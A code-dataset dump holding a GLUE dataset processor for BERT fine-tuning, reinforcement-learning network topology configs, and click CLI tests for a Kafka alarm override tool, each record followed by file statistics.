return [v for c,v in enumerate(my_list) if not c%2] | 25.571429 | 55 | 0.681564 | 34 | 179 | 3.352941 | 0.588235 | 0.210526 | 0.245614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 0.212291 | 179 | 7 | 55 | 25.571429 | 0.787234 | 0.083799 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
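Both kata solutions above keep the elements at even indices; a standalone cross-check (the two bodies copied verbatim, sample input ours):

```python
def remove_every_other(my_list):
    # Slice with a stride of 2: indices 0, 2, 4, ...
    return my_list[::2]

def remove_every_other2(my_list):
    # Same result via enumerate: keep items whose index is even.
    return [v for c, v in enumerate(my_list) if not c % 2]

sample = ["keep", "drop", "keep", "drop", "keep"]
```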
2839358a82feb78190909af5915ea71571e9c775 | 15,755 | py | Python | bert_optimization/glue_processor.py | jeongukjae/bert-optimization | a40761259a0844635272e35711e5fe6e8e771f5c | [
"MIT"
] | 2 | 2020-05-08T10:19:36.000Z | 2020-05-08T12:54:34.000Z | bert_optimization/glue_processor.py | jeongukjae/bert-optimization | a40761259a0844635272e35711e5fe6e8e771f5c | [
"MIT"
] | 5 | 2020-05-09T10:08:21.000Z | 2020-05-27T03:31:15.000Z | bert_optimization/glue_processor.py | jeongukjae/bert-optimization | a40761259a0844635272e35711e5fe6e8e771f5c | [
"MIT"
] | null | null | null | import os
from abc import ABC, abstractmethod, abstractstaticmethod
from typing import Dict, List, Optional, Tuple
import tensorflow as tf
import tensorflow_addons as tfa
from . import tokenizer
from .metrics import F1Score
def read_table(input_path: str, delimiter: str = "\t") -> List[List[str]]:
"""
read table file (like tsv, csv)
change delimiter to parse another format.
"""
with open(input_path) as f:
return [line.strip().split(delimiter) for line in f]
def convert_single_sentence(
data: Tuple[Optional[List[str]], List[str]],
label_to_index: Dict[str, int],
tokenizer: tokenizer.SubWordTokenizer,
max_length: int,
):
labels = [0] * len(data[1]) if data[0] is None else [label_to_index[label] for label in data[0]]
input_ids = []
attention_mask = []
token_type_ids = []
for example in data[1]:
tokens = tokenizer.tokenize(example)[: max_length - 2]
ids = tokenizer.convert_tokens_to_ids(["[CLS]"] + tokens + ["[SEP]"])
padding_size = max_length - len(ids)
input_ids.append(ids + [0] * padding_size)
token_type_ids.append([0] * max_length)
attention_mask.append([1.0] * len(ids) + [0.0] * padding_size)
return (labels, input_ids, token_type_ids, attention_mask)
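The shape bookkeeping in `convert_single_sentence` (truncate to `max_length - 2`, wrap in `[CLS]`/`[SEP]`, zero-pad ids, 1.0/0.0 attention mask) can be checked without the real `SubWordTokenizer`. The stub below is a hypothetical stand-in — whitespace tokenization, placeholder ids 101/102 for the special tokens and 1 for everything else:

```python
class StubTokenizer:
    """Hypothetical stand-in for tokenizer.SubWordTokenizer."""
    vocab = {"[CLS]": 101, "[SEP]": 102}

    def tokenize(self, text):
        return text.split()

    def convert_tokens_to_ids(self, tokens):
        # Unknown tokens map to a placeholder id of 1.
        return [self.vocab.get(t, 1) for t in tokens]

def encode(example, max_length, tok):
    # Same per-example bookkeeping as convert_single_sentence above.
    tokens = tok.tokenize(example)[: max_length - 2]
    ids = tok.convert_tokens_to_ids(["[CLS]"] + tokens + ["[SEP]"])
    pad = max_length - len(ids)
    return ids + [0] * pad, [1.0] * len(ids) + [0.0] * pad

ids, mask = encode("a b c", 8, StubTokenizer())
```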
def convert_sentence_pair(
data: Tuple[Optional[List[str]], List[str], List[str]],
label_to_index: Dict[str, int],
tokenizer: tokenizer.SubWordTokenizer,
max_length: int,
):
labels = [0] * len(data[1]) if data[0] is None else [label_to_index[label] for label in data[0]]
input_ids = []
attention_mask = []
token_type_ids = []
for example_index in range(len(data[1])):
tokens_a = tokenizer.tokenize(data[1][example_index])
tokens_b = tokenizer.tokenize(data[2][example_index])
truncate_seq_pair(tokens_a, tokens_b, max_length - 3)
ids = tokenizer.convert_tokens_to_ids(["[CLS]"] + tokens_a + ["[SEP]"] + tokens_b + ["[SEP]"])
padding_size = max_length - len(ids)
input_ids.append(ids + [0] * padding_size)
token_type_ids.append([0] * (len(tokens_a) + 2) + [1] * (len(tokens_b) + 1) + [0] * padding_size)
attention_mask.append([1.0] * len(ids) + [0.0] * padding_size)
assert len(input_ids[-1]) == max_length
assert len(token_type_ids[-1]) == max_length
assert len(attention_mask[-1]) == max_length
return (labels, input_ids, token_type_ids, attention_mask)
def truncate_seq_pair(tokens_a, tokens_b, max_length):
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
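`truncate_seq_pair` always pops from the currently longer sequence, so the two sides shrink toward equal length until the pair fits the budget. A quick check of that behavior (standalone copy of the function, sample tokens ours):

```python
def truncate_seq_pair(tokens_a, tokens_b, max_length):
    # Pop from the longer list until the combined length fits.
    while len(tokens_a) + len(tokens_b) > max_length:
        if len(tokens_a) > len(tokens_b):
            tokens_a.pop()
        else:
            tokens_b.pop()

a = list("abcdefg")  # 7 tokens
b = list("xyz")      # 3 tokens
truncate_seq_pair(a, b, 8)
```

Only the longer side loses tokens: two pops from `a`, none from `b`.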
class GLUEClassificationProcessor(ABC):
@abstractmethod
def get_train(self, path: str):
raise NotImplementedError
@abstractmethod
def get_dev(self, path: str):
raise NotImplementedError
@abstractmethod
def get_test(self, path: str):
raise NotImplementedError
    @abstractmethod
def get_label_to_index(self):
raise NotImplementedError
@abstractmethod
def update_state(self, target, preds, validation=False):
raise NotImplementedError
@abstractmethod
def get_metrics(self, validation=False):
raise NotImplementedError
@abstractmethod
def reset_states(self, validation=False):
raise NotImplementedError
@abstractmethod
def get_hash(self):
raise NotImplementedError
@abstractmethod
def get_key(self):
raise NotImplementedError
class CoLAProcessor(GLUEClassificationProcessor):
def __init__(self):
self.mcc = tfa.metrics.MatthewsCorrelationCoefficient(num_classes=1)
self.acc = tf.keras.metrics.SparseCategoricalAccuracy()
self.val_mcc = tfa.metrics.MatthewsCorrelationCoefficient(num_classes=1)
self.val_acc = tf.keras.metrics.SparseCategoricalAccuracy()
def get_train(self, path: str):
return self.parse_cola_dataset(read_table(os.path.join(path, "train.tsv")), False)
def get_dev(self, path: str):
return self.parse_cola_dataset(read_table(os.path.join(path, "dev.tsv")), False)
def get_test(self, path: str):
return self.parse_cola_dataset(read_table(os.path.join(path, "train.tsv")), True)
def get_label_to_index(self):
return {"1": 1, "0": 0}
@tf.function
def update_state(self, targets, preds, validation=False):
if validation:
self.val_acc.update_state(targets, preds)
self.val_mcc.update_state(tf.expand_dims(targets, 1), tf.expand_dims(tf.argmax(preds, -1), 1))
else:
self.acc.update_state(targets, preds)
self.mcc.update_state(tf.expand_dims(targets, 1), tf.expand_dims(tf.argmax(preds, -1), 1))
def get_metrics(self, validation=False):
if validation:
return {"Acc": self.val_acc.result(), "MCC": self.val_mcc.result()[0]}
return {"Acc": self.acc.result(), "MCC": self.mcc.result()[0]}
def reset_states(self, validation=False):
if validation:
self.val_acc.reset_states()
self.val_mcc.reset_states()
else:
self.acc.reset_states()
self.mcc.reset_states()
def get_hash(self):
return f"{self.val_mcc.result()[0]:.4f}-{self.val_acc.result():.4f}"
def get_key(self):
return self.val_mcc.result()[0]
@staticmethod
def parse_cola_dataset(lines: List[List[str]], is_test: bool) -> Tuple[Optional[List[str]], List[str]]:
"""
Parse CoLA Dataset (GLUE)
"""
if is_test:
# test.tsv has header row
return None, [line[1] for line in lines[1:]]
return [line[1] for line in lines], [line[3] for line in lines]
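`parse_cola_dataset` encodes the CoLA TSV layout: train/dev rows carry the label in column 1 and the sentence in column 3, while the test file has a header row and the sentence in column 1. A standalone copy of that column mapping with made-up sample rows:

```python
def parse_cola(lines, is_test):
    """Same column mapping as CoLAProcessor.parse_cola_dataset."""
    if is_test:
        # test.tsv has a header row; sentence is in column 1.
        return None, [line[1] for line in lines[1:]]
    # train/dev: label in column 1, sentence in column 3.
    return [line[1] for line in lines], [line[3] for line in lines]

rows = [["gj04", "1", "", "They drank the pub dry."],
        ["gj04", "0", "*", "They drank the pub."]]
labels, sentences = parse_cola(rows, False)
```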
class MRPCProcessor(GLUEClassificationProcessor):
def __init__(self):
self.acc = tf.keras.metrics.SparseCategoricalAccuracy()
self.f1 = F1Score()
self.val_acc = tf.keras.metrics.SparseCategoricalAccuracy()
self.val_f1 = F1Score()
def get_train(self, path: str):
return self.parse_mrpc_dataset(read_table(os.path.join(path, "train.tsv")), False)
def get_dev(self, path: str):
return self.parse_mrpc_dataset(read_table(os.path.join(path, "dev.tsv")), False)
def get_test(self, path: str):
return self.parse_mrpc_dataset(read_table(os.path.join(path, "train.tsv")), True)
def get_label_to_index(self):
return {"1": 1, "0": 0}
@tf.function
def update_state(self, targets, preds, validation=False):
maxed_preds = tf.math.argmax(preds, -1)
if validation:
self.val_acc.update_state(targets, preds)
self.val_f1.update_state(targets, maxed_preds)
else:
self.acc.update_state(targets, preds)
self.f1.update_state(targets, maxed_preds)
def get_metrics(self, validation=False):
if validation:
return {
"Acc": self.val_acc.result(),
"F1": self.val_f1.result(),
}
return {
"Acc": self.acc.result(),
"F1": self.f1.result(),
}
def reset_states(self, validation=False):
if validation:
self.val_acc.reset_states()
self.val_f1.reset_states()
else:
self.acc.reset_states()
self.f1.reset_states()
def get_hash(self):
return f"{self.val_acc.result():.4f}"
def get_key(self):
return self.val_acc.result()
@staticmethod
def parse_mrpc_dataset(lines: List[List[str]], is_test: bool) -> Tuple[Optional[List[str]], List[str], List[str]]:
"""
Parse MRPC Dataset (GLUE)
"""
# dataset files have a header row
lines = lines[1:]
if is_test:
return None, [line[3] for line in lines], [line[4] for line in lines]
return [line[0] for line in lines], [line[3] for line in lines], [line[4] for line in lines]

class MNLIProcessor(GLUEClassificationProcessor):
    def __init__(self):
        self.acc = tf.keras.metrics.SparseCategoricalAccuracy()
        self.val_acc = tf.keras.metrics.SparseCategoricalAccuracy()

    def get_train(self, path: str):
        return self.parse_mnli_dataset(read_table(os.path.join(path, "train.tsv")), False)

    def get_dev(self, path: str):
        return self.parse_mnli_dataset(read_table(os.path.join(path, "dev_matched.tsv")), False)

    def get_test(self, path: str):
        return self.parse_mnli_dataset(read_table(os.path.join(path, "test_matched.tsv")), True)

    def get_label_to_index(self):
        return {"contradiction": 0, "entailment": 1, "neutral": 2}

    @tf.function
    def update_state(self, targets, preds, validation=False):
        if validation:
            self.val_acc.update_state(targets, preds)
        else:
            self.acc.update_state(targets, preds)

    def get_metrics(self, validation=False):
        if validation:
            return {"Acc": self.val_acc.result()}
        return {"Acc": self.acc.result()}

    def reset_states(self, validation=False):
        if validation:
            self.val_acc.reset_states()
        else:
            self.acc.reset_states()

    def get_hash(self):
        return f"{self.val_acc.result():.4f}"

    def get_key(self):
        return self.val_acc.result()

    @staticmethod
    def parse_mnli_dataset(lines: List[List[str]], is_test: bool) -> Tuple[Optional[List[str]], List[str], List[str]]:
        """
        Parse MNLI Dataset (GLUE)
        """
        # dataset files have a header row
        lines = lines[1:]
        if is_test:
            return None, [line[8] for line in lines], [line[9] for line in lines]
        return [line[-1] for line in lines], [line[8] for line in lines], [line[9] for line in lines]

class SST2Processor(GLUEClassificationProcessor):
    def __init__(self):
        self.acc = tf.keras.metrics.SparseCategoricalAccuracy()
        self.val_acc = tf.keras.metrics.SparseCategoricalAccuracy()

    def get_train(self, path: str):
        return self.parse_sst2_dataset(read_table(os.path.join(path, "train.tsv")), False)

    def get_dev(self, path: str):
        return self.parse_sst2_dataset(read_table(os.path.join(path, "dev.tsv")), False)

    def get_test(self, path: str):
        return self.parse_sst2_dataset(read_table(os.path.join(path, "test.tsv")), True)

    def get_label_to_index(self):
        return {"0": 0, "1": 1}

    @tf.function
    def update_state(self, targets, preds, validation=False):
        if validation:
            self.val_acc.update_state(targets, preds)
        else:
            self.acc.update_state(targets, preds)

    def get_metrics(self, validation=False):
        if validation:
            return {"Acc": self.val_acc.result()}
        return {"Acc": self.acc.result()}

    def reset_states(self, validation=False):
        if validation:
            self.val_acc.reset_states()
        else:
            self.acc.reset_states()

    def get_hash(self):
        return f"{self.val_acc.result():.4f}"

    def get_key(self):
        return self.val_acc.result()

    @staticmethod
    def parse_sst2_dataset(lines: List[List[str]], is_test: bool) -> Tuple[Optional[List[str]], List[str]]:
        """
        Parse SST-2 Dataset (GLUE)
        """
        # dataset files have a header row
        lines = lines[1:]
        if is_test:
            return None, [line[1] for line in lines]
        return [line[1] for line in lines], [line[0] for line in lines]

class RTEProcessor(GLUEClassificationProcessor):
    def __init__(self):
        self.acc = tf.keras.metrics.SparseCategoricalAccuracy()
        self.val_acc = tf.keras.metrics.SparseCategoricalAccuracy()

    def get_train(self, path: str):
        return self.parse_rte_data(read_table(os.path.join(path, "train.tsv")), False)

    def get_dev(self, path: str):
        return self.parse_rte_data(read_table(os.path.join(path, "dev.tsv")), False)

    def get_test(self, path: str):
        return self.parse_rte_data(read_table(os.path.join(path, "test.tsv")), True)

    def get_label_to_index(self):
        return {"not_entailment": 0, "entailment": 1}

    @tf.function
    def update_state(self, targets, preds, validation=False):
        if validation:
            self.val_acc.update_state(targets, preds)
        else:
            self.acc.update_state(targets, preds)

    def get_metrics(self, validation=False):
        if validation:
            return {"Acc": self.val_acc.result()}
        return {"Acc": self.acc.result()}

    def reset_states(self, validation=False):
        if validation:
            self.val_acc.reset_states()
        else:
            self.acc.reset_states()

    def get_hash(self):
        return f"{self.val_acc.result():.4f}"

    def get_key(self):
        return self.val_acc.result()

    @staticmethod
    def parse_rte_data(lines: List[List[str]], is_test: bool) -> Tuple[Optional[List[str]], List[str], List[str]]:
        """
        Parse RTE Dataset (GLUE)
        """
        # dataset files have a header row
        lines = lines[1:]
        if is_test:
            return None, [line[1] for line in lines], [line[2] for line in lines]
        return [line[3] for line in lines], [line[1] for line in lines], [line[2] for line in lines]

class QQPProcessor(GLUEClassificationProcessor):
    def __init__(self):
        self.acc = tf.keras.metrics.SparseCategoricalAccuracy()
        self.f1 = F1Score()
        self.val_acc = tf.keras.metrics.SparseCategoricalAccuracy()
        self.val_f1 = F1Score()

    def get_train(self, path: str):
        return self.parse_qqp_dataset(read_table(os.path.join(path, "train.tsv")), False)

    def get_dev(self, path: str):
        return self.parse_qqp_dataset(read_table(os.path.join(path, "dev.tsv")), False)

    def get_test(self, path: str):
        # NOTE: reads "train.tsv" rather than "test.tsv"; GLUE's QQP test file
        # has a different column layout than parse_qqp_dataset expects, so this
        # may be intentional.
        return self.parse_qqp_dataset(read_table(os.path.join(path, "train.tsv")), True)

    def get_label_to_index(self):
        return {"1": 1, "0": 0}

    @tf.function
    def update_state(self, targets, preds, validation=False):
        maxed_preds = tf.math.argmax(preds, -1)
        if validation:
            self.val_acc.update_state(targets, preds)
            self.val_f1.update_state(targets, maxed_preds)
        else:
            self.acc.update_state(targets, preds)
            self.f1.update_state(targets, maxed_preds)

    def get_metrics(self, validation=False):
        if validation:
            return {
                "Acc": self.val_acc.result(),
                "F1": self.val_f1.result(),
            }
        return {
            "Acc": self.acc.result(),
            "F1": self.f1.result(),
        }

    def reset_states(self, validation=False):
        if validation:
            self.val_acc.reset_states()
            self.val_f1.reset_states()
        else:
            self.acc.reset_states()
            self.f1.reset_states()

    def get_hash(self):
        return f"{self.val_acc.result():.4f}"

    def get_key(self):
        return self.val_acc.result()

    @staticmethod
    def parse_qqp_dataset(lines: List[List[str]], is_test: bool) -> Tuple[Optional[List[str]], List[str], List[str]]:
        """
        Parse QQP Dataset (GLUE)
        """
        # dataset files have a header row; also skip malformed rows
        lines = [line for line in lines[1:] if len(line) == 6]
        if is_test:
            return None, [line[3] for line in lines], [line[4] for line in lines]
        return [line[-1] for line in lines], [line[3] for line in lines], [line[4] for line in lines]
| 32.754678 | 118 | 0.626595 | 2,082 | 15,755 | 4.56244 | 0.077329 | 0.030951 | 0.036846 | 0.039794 | 0.878935 | 0.85209 | 0.833667 | 0.810296 | 0.759764 | 0.743657 | 0 | 0.011716 | 0.246969 | 15,755 | 480 | 119 | 32.822917 | 0.788941 | 0.026277 | 0 | 0.718475 | 0 | 0 | 0.032613 | 0.012716 | 0 | 0 | 0 | 0 | 0.008798 | 1 | 0.231672 | false | 0 | 0.020528 | 0.105572 | 0.457478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 9 |
9546d2d2a3e85e23c6938bc050fae0c6a0097f6c | 2,497 | py | Python | basic_utils/options.py | hzxsnczpku/banrinochoujou | 9e04bc5c561ab674fd10e4991aa4b5ae86364f6c | [
"MIT"
] | 9 | 2017-10-22T07:27:02.000Z | 2019-12-23T08:01:28.000Z | basic_utils/options.py | hzxsnczpku/banrinochoujou | 9e04bc5c561ab674fd10e4991aa4b5ae86364f6c | [
"MIT"
] | null | null | null | basic_utils/options.py | hzxsnczpku/banrinochoujou | 9e04bc5c561ab674fd10e4991aa4b5ae86364f6c | [
"MIT"
] | 1 | 2017-10-31T10:44:04.000Z | 2017-10-31T10:44:04.000Z | """
Here are some default network structures as well as
some lists containing the names of different agents and environments.
"""
net_topology_pol_vec = [
    {'kind': 'dense', 'units': 64},
    {'kind': 'Tanh'},
    {'kind': 'dense', 'units': 64},
    {'kind': 'Tanh'},
    {'kind': 'dense', 'units': 64},
    {'kind': 'Tanh'},
]

net_topology_v_vec = [
    {'kind': 'dense', 'units': 64},
    {'kind': 'Tanh'},
    {'kind': 'dense', 'units': 64},
    {'kind': 'Tanh'},
    {'kind': 'dense', 'units': 64},
    {'kind': 'Tanh'},
]

net_topology_q_vec = [
    {'kind': 'dense', 'units': 64},
    {'kind': 'Tanh'},
    {'kind': 'dense', 'units': 64},
    {'kind': 'Tanh'},
    # {'kind': 'dense', 'units': 64},
    # {'kind': 'ReLU'},
]

net_topology_q_dropout_vec = [
    {'kind': 'dense', 'units': 24},
    {'kind': 'ReLU'},
    {'kind': 'Dropout', 'p': 0.1},
    {'kind': 'dense', 'units': 24},
    {'kind': 'ReLU'},
    {'kind': 'Dropout', 'p': 0.1}
    # {'kind': 'dense', 'units': 64},
    # {'kind': 'ReLU'},
]

net_topology_pol_det_vec = [
    {'kind': 'dense', 'units': 64},
    {'kind': 'Tanh'},
]

net_topology_q_det_vec = [
    {'kind': 'dense', 'units': 64},
    {'kind': 'Tanh'},
]

net_topology_merge_det_vec = [
    {'kind': 'dense', 'units': 64},
    {'kind': 'Tanh'},
    {'kind': 'dense', 'units': 64},
    {'kind': 'Tanh'},
]

net_topology_det_vec = [net_topology_pol_det_vec, net_topology_q_det_vec, net_topology_merge_det_vec]

net_topology_pol_fig = [
    {'kind': 'conv', 'filters': 32, 'stride': 4, 'ker_size': 8},
    {'kind': 'Tanh'},
    {'kind': 'conv', 'filters': 64, 'stride': 2, 'ker_size': 4},
    {'kind': 'Tanh'},
    {'kind': 'conv', 'filters': 64, 'stride': 1, 'ker_size': 3},
    {'kind': 'flatten'},
    {'kind': 'dense', 'units': 512},
    {'kind': 'Tanh'},
]

net_topology_v_fig = [
    {'kind': 'conv', 'filters': 32, 'stride': 4, 'ker_size': 8},
    {'kind': 'Tanh'},
    {'kind': 'conv', 'filters': 64, 'stride': 2, 'ker_size': 4},
    {'kind': 'Tanh'},
    {'kind': 'conv', 'filters': 64, 'stride': 1, 'ker_size': 3},
    {'kind': 'flatten'},
    {'kind': 'dense', 'units': 512},
    {'kind': 'Tanh'},
]

net_topology_q_fig = [
    {'kind': 'conv', 'filters': 32, 'stride': 4, 'ker_size': 8},
    {'kind': 'Tanh'},
    {'kind': 'conv', 'filters': 64, 'stride': 2, 'ker_size': 4},
    {'kind': 'Tanh'},
    {'kind': 'conv', 'filters': 64, 'stride': 1, 'ker_size': 3},
    {'kind': 'flatten'},
    {'kind': 'dense', 'units': 512},
    {'kind': 'Tanh'},
]
| 26.284211 | 101 | 0.50821 | 305 | 2,497 | 3.970492 | 0.160656 | 0.138728 | 0.219653 | 0.184971 | 0.895128 | 0.819983 | 0.819983 | 0.819983 | 0.787779 | 0.786127 | 0 | 0.041075 | 0.210252 | 2,497 | 94 | 102 | 26.56383 | 0.573022 | 0.088907 | 0 | 0.693333 | 0 | 0 | 0.326855 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9551621af2cc0ceb2fdb0db3c8a70ced9245db00 | 8,930 | py | Python | tests/test_override.py | JeffersonLab/kafka-alarm-scripts | e8bdc5dc5079be828825b7f8c21e2a3aea1cd4e1 | [
"MIT"
] | null | null | null | tests/test_override.py | JeffersonLab/kafka-alarm-scripts | e8bdc5dc5079be828825b7f8c21e2a3aea1cd4e1 | [
"MIT"
] | null | null | null | tests/test_override.py | JeffersonLab/kafka-alarm-scripts | e8bdc5dc5079be828825b7f8c21e2a3aea1cd4e1 | [
"MIT"
] | null | null | null | import time
from click.testing import CliRunner
from jaws_libp.avro.serde import OverrideSerde, OverrideKeySerde
from jaws_libp.entities import AlarmOverrideUnion, LatchedOverride, AlarmOverrideKey, OverriddenAlarmType, \
    MaskedOverride, DisabledOverride, FilteredOverride, ShelvedOverride, ShelvedReason, OnDelayedOverride, \
    OffDelayedOverride
from jaws_scripts.client.list_overrides import list_overrides
from jaws_scripts.client.set_override import set_override
def test_latched_override():
    alarm_name = "alarm1"
    override_type = OverriddenAlarmType.Latched
    override_key = AlarmOverrideKey(alarm_name, override_type)
    override = AlarmOverrideUnion(LatchedOverride())

    runner = CliRunner()

    try:
        # Set
        result = runner.invoke(set_override, [alarm_name, '--override', override_type.name])
        assert result.exit_code == 0

        # Get
        result = runner.invoke(list_overrides, ['--export'])
        assert result.exit_code == 0

        override_serde = OverrideSerde(None)
        key_serde = OverrideKeySerde(None)

        assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
    finally:
        # Clear
        result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
        assert result.exit_code == 0


def test_masked_override():
    alarm_name = "alarm1"
    override_type = OverriddenAlarmType.Masked
    override_key = AlarmOverrideKey(alarm_name, override_type)
    override = AlarmOverrideUnion(MaskedOverride())

    runner = CliRunner()

    try:
        # Set
        result = runner.invoke(set_override, [alarm_name, '--override', override_type.name])
        assert result.exit_code == 0

        # Get
        result = runner.invoke(list_overrides, ['--export'])
        assert result.exit_code == 0

        override_serde = OverrideSerde(None)
        key_serde = OverrideKeySerde(None)

        assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
    finally:
        # Clear
        result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
        assert result.exit_code == 0


def test_disabled_override():
    alarm_name = "alarm1"
    comments = "Out of Service"
    override_type = OverriddenAlarmType.Disabled
    override_key = AlarmOverrideKey(alarm_name, override_type)
    override = AlarmOverrideUnion(DisabledOverride(comments))

    runner = CliRunner()

    try:
        # Set
        result = runner.invoke(set_override, [alarm_name, '--override', override_type.name, '--comments', comments])
        assert result.exit_code == 0

        # Get
        result = runner.invoke(list_overrides, ['--export'])
        assert result.exit_code == 0

        override_serde = OverrideSerde(None)
        key_serde = OverrideKeySerde(None)

        assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
    finally:
        # Clear
        result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
        assert result.exit_code == 0


def test_filtered_override():
    alarm_name = "alarm1"
    filter = "Area"
    override_type = OverriddenAlarmType.Filtered
    override_key = AlarmOverrideKey(alarm_name, override_type)
    override = AlarmOverrideUnion(FilteredOverride(filter))

    runner = CliRunner()

    try:
        # Set
        result = runner.invoke(set_override, [alarm_name, '--override', override_type.name, '--filtername', filter])
        assert result.exit_code == 0

        # Get
        result = runner.invoke(list_overrides, ['--export'])
        assert result.exit_code == 0

        override_serde = OverrideSerde(None)
        key_serde = OverrideKeySerde(None)

        assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
    finally:
        # Clear
        result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
        assert result.exit_code == 0


def test_continuous_shelved_override():
    alarm_name = "alarm1"
    expiration_seconds = 15
    expiration_ts = int(time.time() + expiration_seconds) * 1000
    reason = ShelvedReason.Stale_Alarm
    oneshot = False
    comments = "Just until I hear back from tech"
    override_type = OverriddenAlarmType.Shelved
    override_key = AlarmOverrideKey(alarm_name, override_type)
    override = AlarmOverrideUnion(ShelvedOverride(expiration_ts, comments, reason, oneshot))

    runner = CliRunner()

    try:
        # Set
        result = runner.invoke(set_override, [alarm_name, '--override', override_type.name,
                                              '--expirationts', expiration_ts, '--comments', comments,
                                              '--reason', reason.name])
        assert result.exit_code == 0

        # Get
        result = runner.invoke(list_overrides, ['--export'])
        assert result.exit_code == 0

        override_serde = OverrideSerde(None)
        key_serde = OverrideKeySerde(None)

        assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
    finally:
        # Clear
        result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
        assert result.exit_code == 0


def test_oneshot_shelved_override():
    alarm_name = "alarm1"
    expiration_seconds = 15
    expiration_ts = int(time.time() + expiration_seconds) * 1000
    reason = ShelvedReason.Stale_Alarm
    oneshot = True
    comments = "Just until I hear back from tech"
    override_type = OverriddenAlarmType.Shelved
    override_key = AlarmOverrideKey(alarm_name, override_type)
    override = AlarmOverrideUnion(ShelvedOverride(expiration_ts, comments, reason, oneshot))

    runner = CliRunner()

    try:
        # Set
        result = runner.invoke(set_override, [alarm_name, '--override', override_type.name,
                                              '--expirationts', expiration_ts, '--comments', comments,
                                              '--reason', reason.name, '--oneshot'])
        assert result.exit_code == 0

        # Get
        result = runner.invoke(list_overrides, ['--export'])
        assert result.exit_code == 0

        override_serde = OverrideSerde(None)
        key_serde = OverrideKeySerde(None)

        assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
    finally:
        # Clear
        result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
        assert result.exit_code == 0


def test_on_delayed_override():
    alarm_name = "alarm1"
    expiration_seconds = 15
    expiration_ts = int(time.time() + expiration_seconds) * 1000
    override_type = OverriddenAlarmType.OnDelayed
    override_key = AlarmOverrideKey(alarm_name, override_type)
    override = AlarmOverrideUnion(OnDelayedOverride(expiration_ts))

    runner = CliRunner()

    try:
        # Set
        result = runner.invoke(set_override, [alarm_name, '--override', override_type.name,
                                              '--expirationts', expiration_ts])
        assert result.exit_code == 0

        # Get
        result = runner.invoke(list_overrides, ['--export'])
        assert result.exit_code == 0

        override_serde = OverrideSerde(None)
        key_serde = OverrideKeySerde(None)

        assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
    finally:
        # Clear
        result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
        assert result.exit_code == 0


def test_off_delayed_override():
    alarm_name = "alarm1"
    expiration_seconds = 15
    expiration_ts = int(time.time() + expiration_seconds) * 1000
    override_type = OverriddenAlarmType.OffDelayed
    override_key = AlarmOverrideKey(alarm_name, override_type)
    override = AlarmOverrideUnion(OffDelayedOverride(expiration_ts))

    runner = CliRunner()

    try:
        # Set
        result = runner.invoke(set_override, [alarm_name, '--override', override_type.name,
                                              '--expirationts', expiration_ts])
        assert result.exit_code == 0

        # Get
        result = runner.invoke(list_overrides, ['--export'])
        assert result.exit_code == 0

        override_serde = OverrideSerde(None)
        key_serde = OverrideKeySerde(None)

        assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
    finally:
        # Clear
        result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
        assert result.exit_code == 0
| 36.008065 | 116 | 0.656327 | 934 | 8,930 | 6.033191 | 0.09743 | 0.051109 | 0.072405 | 0.085182 | 0.85732 | 0.85732 | 0.85732 | 0.838154 | 0.838154 | 0.759361 | 0 | 0.008205 | 0.235722 | 8,930 | 247 | 117 | 36.153846 | 0.817436 | 0.01243 | 0 | 0.783133 | 0 | 0 | 0.063339 | 0 | 0 | 0 | 0 | 0 | 0.192771 | 1 | 0.048193 | false | 0 | 0.036145 | 0 | 0.084337 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
959cb97354ce6ee439ee7077076a182ddb01336c | 1,910 | py | Python | Problems/2/return_kth_to_last/test_kth_to_last.py | weezybusy/Cracking-the-Coding-Interview | 22b8f62c97781ea5aa388434d75ad5abde42c85a | [
"MIT"
